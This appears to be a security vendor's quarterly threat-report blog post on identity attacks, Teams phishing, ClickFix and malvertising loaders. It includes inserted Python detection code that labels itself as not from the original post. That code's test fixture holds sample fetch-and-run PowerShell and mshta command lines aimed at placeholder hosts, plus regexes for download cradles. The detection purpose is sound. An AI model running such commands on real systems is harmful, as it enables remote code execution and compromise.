EXPEL BLOG

Expel Quarterly Threat Report, Q2 2025: Threat intel recap


· 5 MIN READ · BEN NAHORNEY AND AARON WALTON · JUL 24, 2025

TL;DR

  • This is part two of our Quarterly Threat Report blog series for Q2 2025 
  • You can find part one here
  • Part two is a recap and reflection of the major threats we’ve observed this quarter

 

Attackers have calculated the angles, taken aim, and fired straight shots, volleys, and even some trick shots in an attempt to breach organizations' defenses. With the quarter now behind us, it's time to pause and look at where the arrows have fallen. In the last three months, we've fielded thousands of incidents. Of these, several stood out as unique or interesting. With that in mind, let's take a look at some of the attacks that got closest to their target.

Eye on identity 

In the last quarter, we published stories on several attack groups that targeted user accounts for cloud-based services. 

One constant here is that each attack leverages social engineering in some form or another. In some cases, bad actors leverage phishing sites to steal credentials. Other times it’s a brazen call to the help desk, impersonating a target user.

But the techniques leveraged in these attacks varied greatly, which speaks to the fertile ground that identity has become as an attack surface. 

Let's take a closer look at some of the identity attacks that stood out this quarter.

Atlas Lion tries something new

If we gave out awards for the most creative hack attempt of the quarter, this would go to Atlas Lion. This group is not only well-known for targeting organizations that offer gift cards, but also for having an extensive understanding of the cloud and how to attack it. 

In one incident we encountered this quarter, the group managed to obtain login credentials from several users at a targeted organization. But they didn't just use them to log directly into cloud-based services as you might expect (that came later). Instead, they spun up a virtual machine (VM) in a cloud account they controlled and used the stolen credentials to sign in to that VM. Because the target organization used Microsoft Entra ID, the sign-in let the attacker-controlled VM be joined to the organization's Entra ID tenant, where it briefly appeared as an enrolled device.

Fortunately, the organization's device onboarding process required Microsoft Defender to be installed, so the VM was promptly flagged and removed. This highlights the importance of enforcing policies like this whenever a new device is added, and it points to device enrollment as another attack surface that defenders should consider when protecting against identity attacks.

Scattered Spider returns to the tried-and-true

If any threat actor could be said to have garnered the most attention, it’d be Scattered Spider. The group has carried out several high-profile attacks this quarter (as well as before) and shows no signs of letting up. 

When it comes to identity-related attacks, Scattered Spider is adept at impersonation, and they're not afraid to simply pick up the phone to further an attack. This quarter, we observed the group calling the IT help desk lines of organizations they targeted. While on the phone, they would attempt to have the target user's password reset and register a new phone as an MFA method.

Socially engineered attacks like this are difficult to defend against, especially when attackers are brazen enough to call a help line and speak directly with IT support. Strong authentication policies and security tooling that provide defense in depth are essential. Policies requiring authentications to come from managed devices have been the most successful at thwarting this attacker. Defense in depth also provides much-needed visibility should an attacker gain access to an account: authentication logs, endpoint alerts, and cloud infrastructure activity, with the signals from those tools monitored in real time. If an actor's social engineering does succeed, that visibility gives you the means to see and stop the attack.
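To make the two identity patterns above concrete, here is an added example (not Expel's detection content, and not code from the original post) that runs two simple correlations over constructed, simplified audit events: a device registration from an IP address outside the organization's known ranges (the Atlas Lion pattern), and a help-desk-initiated password reset followed within an hour by a new MFA registration for the same user (the Scattered Spider pattern). The field names, activity strings, and the 203.0.113.0/24 corporate range are assumptions for illustration, not a verified Entra ID log schema.

```python
"""Two identity-log correlations for the patterns described above.

Added example; not Expel's tooling or log schema. Events are constructed and
simplified. Field names and activity strings are assumptions.
"""
from datetime import datetime, timedelta
import ipaddress

# Assumed corporate egress ranges; anything else is "not ours".
CORPORATE_CIDRS = [ipaddress.ip_network("203.0.113.0/24")]

# Constructed sample events (UTC timestamps). Not real telemetry.
SAMPLE_EVENTS = [
    # Normal device join from a corporate address.
    {"time": "2025-05-06T09:02:00", "activity": "Register device",
     "actor": "alice@example.com", "target": "alice@example.com",
     "device": "LAPTOP-ALICE", "ip": "203.0.113.10"},
    # Device join from an address the organization does not own.
    {"time": "2025-05-06T09:15:00", "activity": "Register device",
     "actor": "bob@example.com", "target": "bob@example.com",
     "device": "vm-attacker", "ip": "198.51.100.77"},
    # Help-desk-initiated reset, then a new MFA method 12 minutes later.
    {"time": "2025-05-06T10:00:00", "activity": "Reset user password",
     "actor": "helpdesk1@example.com", "target": "carol@example.com",
     "device": "", "ip": "203.0.113.20"},
    {"time": "2025-05-06T10:12:00", "activity": "User registered security info",
     "actor": "carol@example.com", "target": "carol@example.com",
     "device": "", "ip": "198.51.100.9"},
    # Self-service reset with no MFA change afterwards: not flagged.
    {"time": "2025-05-06T11:00:00", "activity": "Reset user password",
     "actor": "dave@example.com", "target": "dave@example.com",
     "device": "", "ip": "203.0.113.30"},
]


def _ts(event):
    return datetime.fromisoformat(event["time"])


def untrusted_device_joins(events, corporate_cidrs=CORPORATE_CIDRS):
    """Device registrations whose source IP is outside the org's ranges.

    An attacker-controlled VM joined to the tenant (the Atlas Lion case)
    appears as a registration from infrastructure the org does not own.
    Returns (user, device name, ip) tuples.
    """
    findings = []
    for e in events:
        if e["activity"] != "Register device":
            continue
        addr = ipaddress.ip_address(e["ip"])
        if not any(addr in net for net in corporate_cidrs):
            findings.append((e["target"], e["device"], e["ip"]))
    return findings


def helpdesk_reset_then_mfa(events, window_minutes=60):
    """Admin-initiated password reset followed by a new MFA registration
    for the same user within `window_minutes`.

    This is the help-desk social-engineering sequence: reset the password,
    then enrol a phone the attacker controls. Self-service resets (actor ==
    target) and resets with no later MFA change are ignored.
    Returns (user, resetting actor, minutes between the two events) tuples.
    """
    window = timedelta(minutes=window_minutes)
    resets = [e for e in events
              if e["activity"] == "Reset user password" and e["actor"] != e["target"]]
    mfa_adds = [e for e in events if e["activity"] == "User registered security info"]
    findings = []
    for r in resets:
        for m in mfa_adds:
            gap = _ts(m) - _ts(r)
            if m["target"] == r["target"] and timedelta(0) <= gap <= window:
                findings.append((r["target"], r["actor"], int(gap.total_seconds() // 60)))
    return findings


if __name__ == "__main__":
    for f in untrusted_device_joins(SAMPLE_EVENTS):
        print("device registered from outside corporate ranges:", f)
    for f in helpdesk_reset_then_mfa(SAMPLE_EVENTS):
        print("help-desk reset followed by MFA registration:", f)
```

Both rules are deliberately narrow. In practice you would key the reset rule on the help-desk role rather than a single actor, tune the window to your help desk's real workflow, and treat a device registration from a public cloud provider's address space as a stronger signal than one from an unknown residential range.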

 

Aiming at endpoints

Throughout the quarter, we've also published intel on the most dangerous threats we've seen targeting customers' networks.

These were predominantly ransomware threats. The tactics are important to understand because in years past, the same ransomware gangs relied on phishing as their main means of gaining access to networks. As public and private entities have fought back, these actors have shifted to other techniques, and new tactics require new defenses.

Phishing through Microsoft Teams

Last year, organizations began seeing social-engineering attacks from ransomware gangs that leveraged Microsoft Teams. The attack normally started with the target suddenly receiving a large volume of spam email. They were then contacted through Teams by someone posing as IT support and offering to help with the spam problem. The offer was a ploy: the attackers used the session to install remote monitoring and management (RMM) tools and gain persistent access to the target network.

This year, the cybersecurity community gained unique insight into the origin of this attack: it was developed by the Black Basta ransomware gang. That insight came from the exposure of the gang's private chat logs.

Though developed by Black Basta, the tactic is now actively used by ransomware affiliates working for other gangs (potentially including people who originally worked for Black Basta). We saw a spike in this activity in April, and the technique continues to be used.

Access by other means

Beyond Teams phishing, threat actors are attempting to gain access to environments through infected websites and malicious advertisements. These methods deploy initial access tools (IATs) whose primary purpose is gaining a foothold in an enterprise network.

Two IATs known to be used by ransomware actors were in our sights this quarter: Latrodectus and OysterLoader. Both malware families were developed by well-resourced ransomware gangs that were (and still are) willing to invest heavily in their attempts to compromise networks.

Part of this investment includes using code-signing certificates to make their software look legitimate, which MITRE ATT&CK tracks as technique T1553.002, Subvert Trust Controls: Code Signing. For more on this technique, see our analysis of the Black Basta gang's chat logs and how they used code signing.

Latrodectus 

This malware is delivered through infected websites, which makes it difficult to avoid: the sites may belong to partner organizations, or users may stumble onto them while casually browsing the internet. The infected websites use a lure called ClickFix. In this case, the actor shows a fake network connection error and instructs the user to press a series of keys to resolve it (typically opening the Run dialog and pasting a command the page has already placed on the clipboard). A user who follows the instructions unintentionally executes a script that loads the malware into memory, allowing Latrodectus to bypass several opportunities for detection.
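As an added example (not Expel's detection logic and not code from the original post), the following triage function applies the ClickFix observation above: because the lure has the user run the pasted command from the Run dialog, the malicious script host is a child of explorer.exe. It scans constructed, simplified process-creation records for that parent, a scripting host as the child, and command-line traits such as a remote URL, a hidden window, an encoded command, a download cradle, or a trailing comment used to make the pasted text look benign. The field names and sample command lines are constructed for illustration.

```python
"""Process-creation triage for the ClickFix lure described above.

Added example; not Expel's detection content. The event records are
constructed, simplified process-creation events (field names are
assumptions); the same logic applies to Sysmon Event ID 1 or EDR telemetry.
"""
import re

# Script hosts an attacker would have the victim launch from the Run dialog.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe"}

# (indicator name, regex applied to the command line)
INDICATORS = [
    ("remote_url", re.compile(r"https?://", re.I)),
    ("hidden_window", re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I)),
    ("encoded_command", re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("invoke_expression", re.compile(r"\b(iex|invoke-expression)\b", re.I)),
    ("download_cradle", re.compile(r"(downloadstring|invoke-webrequest|\biwr\b|\bcurl\b)", re.I)),
    # A human-readable comment appended so the Run box shows benign-looking text.
    ("trailing_comment", re.compile(r"#\s*\S[^#]{10,}$")),
]

# Constructed sample events. Not real telemetry.
SAMPLE_EVENTS = [
    # ClickFix: hidden PowerShell pulling a script, with a "fix" comment appended.
    {"host": "WS01", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": 'powershell -w hidden -c "iex (iwr http://198.51.100.23/fix.ps1 -UseBasicParsing)" '
                     '# Fix network error: DNS_PROBE_FINISHED'},
    # ClickFix variant: mshta fetching a remote HTA. One indicator, but mshta + URL is enough.
    {"host": "WS02", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta https://198.51.100.24/verify.hta"},
    # Admin running a local script from the Run box: same parent, no indicators.
    {"host": "WS03", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell -NoProfile -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"},
    # Suspicious command line, but launched by a service, not the Run dialog.
    {"host": "WS04", "parent_image": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell -w hidden -enc SQBFAFgAIAAoAEkAVwBSACAAaAB0AHQAcAA6AC8ALwAxAC4AMgAuADMALgA0AC8AYQApAA=="},
]


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def score_event(event):
    """Names of the INDICATORS matched by one event's command line, in list order."""
    return [name for name, rx in INDICATORS if rx.search(event["command_line"])]


def triage_clickfix(events, min_hits=2):
    """Flag Run-dialog launches (parent explorer.exe) of a script host whose
    command line carries at least `min_hits` indicators, or mshta.exe given
    any remote URL. Returns one dict per flagged event."""
    findings = []
    for e in events:
        image = _basename(e["image"])
        if _basename(e["parent_image"]) != "explorer.exe" or image not in SCRIPT_HOSTS:
            continue
        hits = score_event(e)
        if len(hits) >= min_hits or (image == "mshta.exe" and "remote_url" in hits):
            findings.append({"host": e["host"], "image": image, "hits": hits})
    return findings


if __name__ == "__main__":
    for f in triage_clickfix(SAMPLE_EVENTS):
        print(f["host"], f["image"], ", ".join(f["hits"]))
```

The parent filter is what makes this specific to ClickFix: the same command line launched by a scheduled task, an Office macro, or a browser process (the WS04 record) needs its own rule. During triage on the host, the Run dialog also keeps what the user typed or pasted under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which confirms the lure even when process telemetry is incomplete.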

OysterLoader

OysterLoader is being distributed through malicious advertisements. Bad actors have pushed these ads through Bing, advertising trojanized versions of the well-known administrative tool PuTTY. The malware itself is known to be used by the Rhysida ransomware gang (formerly known as Vice Society). By targeting administrative users, the ransomware actors can gain access to much of the network once they have a foothold.

That’s a wrap on Q2 2025

On the identity front, we've seen more malicious access attempts blocked by existing controls. Similarly, the volume of non-targeted malware dropped this quarter: incidents caused by the ClickFix tactic have declined, as has the percentage of Lumma infostealer incidents we've seen.

That's not to say there's reason to sit back and relax. It's possible that attackers are currently retooling for new attacks in light of significant takedown activity this quarter.

Attackers certainly appear to be shifting tactics, if the increases in Microsoft Teams phishing, infected websites, and malicious advertisements are any indication.

There were also several new and novel techniques that we hadn't seen before, including Atlas Lion joining an attacker-controlled VM to a victim's Entra ID tenant.

These are all fronts that we’ll be continuing to monitor here at Expel as we continue to track data, identify patterns, and share insights to help you and your org stay protected.